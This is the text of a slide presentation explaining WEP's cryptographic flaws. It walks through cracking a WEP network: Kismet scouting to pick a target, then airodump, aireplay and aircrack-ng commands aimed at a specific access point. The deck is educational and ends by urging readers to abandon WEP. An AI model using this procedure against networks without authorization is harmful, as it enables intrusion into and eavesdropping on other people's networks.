The Trouble with WEP

Or, cracking WiFi networksfor fun & profit (not really)

Jim Owens

Overview

Background and a little history How WEP works WEP’s major weaknesses A short course in wardriving

Using kismet to scout out the wireless landscape

Zeroing in with the aircrack-ng suite airodump, to capture traffic aireplay, to replay weakly encrypted packets aircrack, to find the key using statistical

methods

Background & history…

Wireless Equivalent Privacy Adopted in 1999 as part of 802.11

standard Later swallowed whole by 802.11b

standard Initially, used only 40-bit encryption

keys, due to technology export restrictions

Later, expanded to 104-bit keys when export restrictions were eased

Used 6 times as often as WPA/WPA2 despite known fatal weakness* (85% / 14% / 1%)

*Based on a 2006 survey in Seattle area

How WEP works

Plain text gets CRC-32 checksum appended

24-bit initialization vector pre-pended to key as a seed for RC4 key scheduling algorithm

RC4’s pseudo-random generation algorithm outputs keystream

Keystream XORed with plain text IV in plain text pre-pended to message On receipt, keystream regenerated and

XORed with cipher text to produce plain text

WEP’s major weaknesses

IV space too small (224) On a busy network, IVs must repeat in <= 5

hours 50% probability that IV repeats in 5,000

packets RC4 algorithm produces “weak” IVs that

can be correctly guessed 5% or 13% of the time

No key management; typically just one key

IP traffic contains much known plaintext data

Open to injected traffic that is rebroadcast

Wardriving: Kismet

Network detector, sniffer, IDS Works on 802.11b, 802.11a, 802.11g

networks Uses passive monitoring, so hard to

detect Logs sniffed packets in formats

compatible with Wireshark/Tcpdump, Airsnort

Channel surfs automatically Optionally, supports GPS for network

location

Kismet: Install & configure

Binary packages available for most systems

Requires WiFi adaptor that supports monitor mode as “capture source”

Logs traffic in popular formats* Specify source in

/etc/kismet/kismet.conf, as driver,device,source_name

source=ipw2200,eth1,Stella

*Wireshark, Airsnort, etc.

Stella, the WiFi attack animal!

Wardriving: Recon phase

Use Kismet to survey WiFi landscape and to choose a target network

Record necessary data for Aircrack attack: Channel number? SSID? Access point MAC address?

Wardriving: Kismet

Wardriving: Attack phase Aircrack-ng: Software for network

detection, sniffing, WEP cracking, and analysis

Works on 802.11b, 802.11a, 802.11g Uses passive monitoring & packet

injection Main tools

aircrack-ng: Cracking airdecap: Packet decryption airmon: Monitor mode switching aireplay: Packet injection (Linux only) airodump: Exports traffic to .cap files

Wardriving: Aircrack procedure

1.Bring up adapter on target’s channel in monitor mode:

# ifconfig wlan0 up# iwconfig wlan0 mode Monitor channel 9

Capture packets to file on channel, IVs only

# airodump wlan0 ./berlin_dump 9 1

Wardriving: Airodump

Wardriving: Aircrack procedure

1.Find weakly-encrypted packets to replay in interactive mode

# aireplay ­2 ­b 00:14:6C:40:BA:A6 \­x 512 wlan0

Finally, crack WEP key with captured IVs

# aircrack ­n 64 berlin­dump.ivs

Wardriving: Aireplay

Wardriving: Aircrack

Summary

WEP has numerous serious flaws WEP's flaws are thoroughly documented WEP is readily exploitable in a short

time, by unskilled attackers, using readily available tools

Strong protection is readily available Bottom line:

Don't use WEP, period!

Questions?